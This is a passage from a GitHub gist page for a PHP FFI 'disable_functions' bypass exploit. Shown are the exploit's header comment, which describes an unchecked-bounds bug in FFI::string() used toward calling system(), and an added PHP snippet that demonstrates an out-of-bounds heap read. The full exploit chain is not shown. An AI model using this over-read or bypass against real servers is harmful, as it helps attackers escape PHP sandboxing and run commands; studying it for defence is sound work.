Hunter Gregal huntergregal

🏠
View GitHub Profile
@huntergregal
huntergregal / php_FFI_exploit.php
Created July 8, 2020 00:08
PHP FFI disable_functions Bypass (no FFI::load or FFI::cdefs) hunter gregal
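The file header below lists, as BUG #1, that FFI::string() skips its size check when the CData argument is pointer-typed. The snippet here is an added example, not part of huntergregal's gist, that makes that contrast visible by reading the same 16-byte buffer once through its array type and once through a `char *` obtained with FFI::addr(). It assumes PHP 7.4 with ext/ffi loaded and `ffi.enable=On` (the default `preload` setting refuses FFI::new() from an ordinary script); the over-read length of 256 is an arbitrary choice and, like any out-of-bounds read, can fault if it crosses an unmapped page.

```php
<?php
// Added example, not code from the gist: array-typed reads are bounds-checked
// by ext/ffi, pointer-typed reads of the same memory are not.
// Assumption: PHP 7.4, ext/ffi loaded, ffi.enable=On.

$buf = FFI::new("char[16]");
FFI::memcpy($buf, str_repeat("A", 16), 16);

// Array-typed CData: asking for more than the 16 declared bytes is refused.
try {
    FFI::string($buf, 256);
    echo "array read unexpectedly succeeded\n";
} catch (FFI\Exception $e) {
    echo "array read refused: ", $e->getMessage(), "\n";
}

// Pointer-typed CData (char *) aimed at the same storage: the identical
// 256-byte request goes through and returns heap bytes past the array.
$ptr  = FFI::addr($buf[0]);
$leak = FFI::string($ptr, 256);
printf("pointer read returned %d bytes; first 16: %s\n",
       strlen($leak), substr($leak, 0, 16));
```

Run it with `php -d ffi.enable=On example.php`; the first call throws, the second returns 256 bytes of which only the first 16 belong to `$buf`.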
<?php
/*
FFI Exploit - uses 3 potential BUGS.
PHP was contacted and said nothing in FFI is a security issue.
Able to call system($cmd) without using FFI::load() or FFI::cdef()
* BUG #1 (maybe intended, but why have any size checks then?)
no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)